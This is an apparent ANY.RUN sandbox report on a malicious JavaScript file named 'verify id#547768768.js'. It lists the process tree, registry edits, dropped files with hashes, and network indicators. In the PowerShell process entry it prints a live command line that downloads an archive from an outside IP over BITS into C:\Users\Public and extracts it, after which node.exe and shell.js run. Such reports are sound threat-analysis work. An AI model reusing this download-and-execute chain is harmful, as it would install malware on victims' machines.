File name:

verify id#547768768.js

Full analysis: https://app.any.run/tasks/8cccef35-a9fc-4d9a-ba77-6b44fb751806
Verdict: Malicious activity
Analysis date: December 02, 2023, 16:41:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
opendir
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

FFBABE4855B1647A121BE0A7D3340350

SHA1:

5C2D168562A154D58451D4A7F2B9DA5BF7BFF7A4

SHA256:

978BF1471B3536DFDEA854DD1C5D8EE63BDFBC8223C0254A92B183A711699A3A

SSDEEP:

48:SAsXiBD0V/LCuX5shc1CqMe3TCinBUps35b1kkP8OFzNQdPUpvWQahKzaay:nsXi1MvX1CqLnp5bym5QdXszaay

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Probably downloads file via BitsAdmin

      • powershell.exe (PID: 1612)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1584)
      • powershell.exe (PID: 1612)
      • wscript.exe (PID: 2844)
    • Found IP address in command line

      • powershell.exe (PID: 1612)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1584)
    • The process executes JS scripts

      • wscript.exe (PID: 1584)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1584)
      • wscript.exe (PID: 2844)
    • Application launched itself

      • wscript.exe (PID: 1584)
  • INFO

    • Checks supported languages

      • node.exe (PID: 1000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs wscript.exe no specs node.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1000"C:\Users\Public\node.exe" C:\Users\Public\install.jsC:\Users\Public\node.exewscript.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js JavaScript Runtime
Exit code:
216
Version:
18.18.2
Modules
Images
c:\users\public\node.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
1584"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\verify id#547768768.js"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1612"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://185.81.157.148:777/j.jpg' -Destination 'C:\Users\Public\ben.zip';Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -ForceC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2844"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js" C:\Windows\System32\wscript.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
2 140
Read events
2 102
Write events
38
Delete events
0

Modification events

(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1612) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2844) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
0
Suspicious files
3
Text files
13
Unknown types
0

Dropped files

PID
Process
Filename
Type
1612powershell.exeC:\Users\Public\node.exe
MD5:
SHA256:
1612powershell.exeC:\Users\admin\AppData\Local\Temp\h3lmbrfz.rh5.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1612powershell.exeC:\Users\Public\run.jstext
MD5:FFA3482EB9D23F91AD38BE8B58082B9C
SHA256:0A08BF97A2DC036ECD3F8791F4DFB9A41A01C40901BACD130827C6BF5DEF72F8
1612powershell.exeC:\Users\Public\Framework.dlltext
MD5:6A08392ECF95DF7FC91917DCFAAE8DA6
SHA256:0A572EE5508D9310936801A04237D56F118DFF4DBAA98F60070988CC4B8CA460
1612powershell.exeC:\Users\Public\app.jstext
MD5:A307C4557D5FDF209E1B38A803E03B52
SHA256:3A16F15174757A5F84AE743DB042B62B2554620118DE63BE2E7086827F114BF5
1612powershell.exeC:\Users\Public\msg.dlltext
MD5:40CEFDB2CFEE5741F94A207C6BD2EF1A
SHA256:4C514A6638A0256A8B7CCBDDD14EC3E7CD235D0B45780B6B24C51D5E4A4CA6E8
1612powershell.exeC:\Users\Public\method.dlltext
MD5:38B97710070DBDD7B3359C0D52DA4A72
SHA256:675F06AF4E7F254D55AC605BBD7DA45D9E00207A97F8A8AB7BB747D512776BC7
1612powershell.exeC:\Users\Public\invoke.dlltext
MD5:B9376E9E3C4D48F5E35A3F355AE1F74A
SHA256:90092E5FB861DD4FF34FA20F4B31CA44EBBB3BC367A8D7A35B89A7F89C793FA9
1612powershell.exeC:\Users\Public\runpe.dlltext
MD5:BE92F1480679D6BB88CA61CFF125BE40
SHA256:39D666E2A76BD47FB73DD712A8BF30DDE586C43CB483E6E4DBD180E3701A1343
1612powershell.exeC:\Users\admin\AppData\Local\Temp\slcostln.g5j.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
884
svchost.exe
HEAD
200
185.81.157.148:777
http://185.81.157.148:777/j.jpg
unknown
unknown
884
svchost.exe
GET
200
185.81.157.148:777
http://185.81.157.148:777/j.jpg
unknown
compressed
23.9 Mb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1956
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
324
svchost.exe
224.0.0.252:5355
unknown
884
svchost.exe
185.81.157.148:777
Inulogic Sarl
FR
unknown

DNS requests

No data

Threats

No threats detected
No debug info